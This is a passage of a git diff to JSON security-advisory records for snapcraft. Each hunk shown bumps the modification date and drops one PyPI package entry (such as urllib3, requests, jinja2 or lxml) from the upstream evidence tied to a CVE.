"1.7.3", "id": "BREW-snapcraft-CVE-2021-41945", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-43818.json b/advisories/BREW-snapcraft-CVE-2021-43818.json index efc6ad2892..c104bcb3a6 100644 --- a/advisories/BREW-snapcraft-CVE-2021-43818.json +++ b/advisories/BREW-snapcraft-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-43818", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-1941.json b/advisories/BREW-snapcraft-CVE-2022-1941.json index 21c6c53d42..2ba8c49728 100644 --- a/advisories/BREW-snapcraft-CVE-2022-1941.json +++ b/advisories/BREW-snapcraft-CVE-2022-1941.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-1941", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-2309.json b/advisories/BREW-snapcraft-CVE-2022-2309.json index 7ccb540522..0fa034cf7c 100644 --- a/advisories/BREW-snapcraft-CVE-2022-2309.json +++ b/advisories/BREW-snapcraft-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-2309", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-36087.json b/advisories/BREW-snapcraft-CVE-2022-36087.json index 18776e4fbc..15c7c4de4a 100644 --- a/advisories/BREW-snapcraft-CVE-2022-36087.json +++ b/advisories/BREW-snapcraft-CVE-2022-36087.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-36087", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-3pgj-pg6c-r5p7", "CVE-2022-36087", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oauthlib", - "subject_version": "3.3.1", - "key": "pkg:pypi/oauthlib@3.3.1", - "resource": "oauthlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-40897.json b/advisories/BREW-snapcraft-CVE-2022-40897.json index dd69958034..0ac9b32eb3 100644 --- a/advisories/BREW-snapcraft-CVE-2022-40897.json +++ b/advisories/BREW-snapcraft-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-40897", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2023-32681.json b/advisories/BREW-snapcraft-CVE-2023-32681.json index 27900301aa..97cfbf8a4d 100644 --- a/advisories/BREW-snapcraft-CVE-2023-32681.json +++ b/advisories/BREW-snapcraft-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2023-32681", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2023-43804.json b/advisories/BREW-snapcraft-CVE-2023-43804.json index 72d5a35481..c098da8e38 100644 --- a/advisories/BREW-snapcraft-CVE-2023-43804.json +++ b/advisories/BREW-snapcraft-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2023-43804", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2023-45803.json b/advisories/BREW-snapcraft-CVE-2023-45803.json index 3f4e3f93b7..880e71c3f5 100644 --- a/advisories/BREW-snapcraft-CVE-2023-45803.json +++ b/advisories/BREW-snapcraft-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2023-45803", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-22195.json b/advisories/BREW-snapcraft-CVE-2024-22195.json index ea269612ab..3a7efbacb4 100644 --- a/advisories/BREW-snapcraft-CVE-2024-22195.json +++ b/advisories/BREW-snapcraft-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-22195", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-34064.json b/advisories/BREW-snapcraft-CVE-2024-34064.json index fa0d39c110..9727d4e02d 100644 --- a/advisories/BREW-snapcraft-CVE-2024-34064.json +++ b/advisories/BREW-snapcraft-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-34064", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-35195.json b/advisories/BREW-snapcraft-CVE-2024-35195.json index 78f60b2bf2..959acdb690 100644 --- a/advisories/BREW-snapcraft-CVE-2024-35195.json +++ b/advisories/BREW-snapcraft-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-35195", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-3651.json b/advisories/BREW-snapcraft-CVE-2024-3651.json index 1e22dab851..29895fa05b 100644 --- a/advisories/BREW-snapcraft-CVE-2024-3651.json +++ b/advisories/BREW-snapcraft-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-3651", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-37891.json b/advisories/BREW-snapcraft-CVE-2024-37891.json index 7844a93d95..62b4f83327 100644 --- a/advisories/BREW-snapcraft-CVE-2024-37891.json +++ b/advisories/BREW-snapcraft-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-37891", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-47081.json b/advisories/BREW-snapcraft-CVE-2024-47081.json index 8db1044b6f..10991c93a7 100644 --- a/advisories/BREW-snapcraft-CVE-2024-47081.json +++ b/advisories/BREW-snapcraft-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-47081", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-56201.json b/advisories/BREW-snapcraft-CVE-2024-56201.json index 4cdded6e0a..fb73b31072 100644 --- a/advisories/BREW-snapcraft-CVE-2024-56201.json +++ b/advisories/BREW-snapcraft-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-56201", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-56326.json b/advisories/BREW-snapcraft-CVE-2024-56326.json index 58c9a18917..a5dfe9b4ca 100644 --- a/advisories/BREW-snapcraft-CVE-2024-56326.json +++ b/advisories/BREW-snapcraft-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-56326", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-6345.json b/advisories/BREW-snapcraft-CVE-2024-6345.json index 5db5ba28d2..a554babff4 100644 --- a/advisories/BREW-snapcraft-CVE-2024-6345.json +++ b/advisories/BREW-snapcraft-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-6345", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-27516.json b/advisories/BREW-snapcraft-CVE-2025-27516.json index acb49a571c..da201040b1 100644 --- a/advisories/BREW-snapcraft-CVE-2025-27516.json +++ b/advisories/BREW-snapcraft-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-27516", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-43859.json b/advisories/BREW-snapcraft-CVE-2025-43859.json index 5b6ac47d6d..0ab6b36d87 100644 --- a/advisories/BREW-snapcraft-CVE-2025-43859.json +++ b/advisories/BREW-snapcraft-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-43859", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-4565.json b/advisories/BREW-snapcraft-CVE-2025-4565.json index 27471108e2..4d027e2861 100644 --- a/advisories/BREW-snapcraft-CVE-2025-4565.json +++ b/advisories/BREW-snapcraft-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-4565", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-47273.json b/advisories/BREW-snapcraft-CVE-2025-47273.json index 75b10adaff..a0dcda14f1 100644 --- a/advisories/BREW-snapcraft-CVE-2025-47273.json +++ b/advisories/BREW-snapcraft-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-47273", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-50181.json b/advisories/BREW-snapcraft-CVE-2025-50181.json index a64f1be749..3a0beb27ed 100644 --- a/advisories/BREW-snapcraft-CVE-2025-50181.json +++ b/advisories/BREW-snapcraft-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-50181", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-50182.json b/advisories/BREW-snapcraft-CVE-2025-50182.json index 9a6e2d6433..ebac291cd4 100644 --- a/advisories/BREW-snapcraft-CVE-2025-50182.json +++ b/advisories/BREW-snapcraft-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-50182", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-66418.json b/advisories/BREW-snapcraft-CVE-2025-66418.json index 58fa04ff85..49dfe45d75 100644 --- a/advisories/BREW-snapcraft-CVE-2025-66418.json +++ b/advisories/BREW-snapcraft-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-66418", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-66471.json b/advisories/BREW-snapcraft-CVE-2025-66471.json index 4f473acfd8..129930e8da 100644 --- a/advisories/BREW-snapcraft-CVE-2025-66471.json +++ b/advisories/BREW-snapcraft-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-66471", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-69277.json b/advisories/BREW-snapcraft-CVE-2025-69277.json index d03fe44435..0ab7241921 100644 --- a/advisories/BREW-snapcraft-CVE-2025-69277.json +++ b/advisories/BREW-snapcraft-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-69277", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-0994.json b/advisories/BREW-snapcraft-CVE-2026-0994.json index 5770e2231e..1f97d95bc1 100644 --- a/advisories/BREW-snapcraft-CVE-2026-0994.json +++ b/advisories/BREW-snapcraft-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-0994", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-21441.json b/advisories/BREW-snapcraft-CVE-2026-21441.json index 650a5ddd3c..35dd707ae3 100644 --- a/advisories/BREW-snapcraft-CVE-2026-21441.json +++ b/advisories/BREW-snapcraft-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-21441", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-23949.json b/advisories/BREW-snapcraft-CVE-2026-23949.json index fbaa1655bb..c9559fe5b5 100644 --- a/advisories/BREW-snapcraft-CVE-2026-23949.json +++ b/advisories/BREW-snapcraft-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-23949", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-25645.json b/advisories/BREW-snapcraft-CVE-2026-25645.json index 273da5a79a..8be21f2a6d 100644 --- a/advisories/BREW-snapcraft-CVE-2026-25645.json +++ b/advisories/BREW-snapcraft-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-25645", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-41066.json b/advisories/BREW-snapcraft-CVE-2026-41066.json index 9d4fb4455c..6b7518d55a 100644 --- a/advisories/BREW-snapcraft-CVE-2026-41066.json +++ b/advisories/BREW-snapcraft-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-41066", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-44431.json b/advisories/BREW-snapcraft-CVE-2026-44431.json index 37d0b05c5f..ac8bd5c404 100644 --- a/advisories/BREW-snapcraft-CVE-2026-44431.json +++ b/advisories/BREW-snapcraft-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-44431", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-44432.json b/advisories/BREW-snapcraft-CVE-2026-44432.json index 88a6ab8236..67c5c72c50 100644 --- a/advisories/BREW-snapcraft-CVE-2026-44432.json +++ b/advisories/BREW-snapcraft-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-44432", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-45409.json b/advisories/BREW-snapcraft-CVE-2026-45409.json index 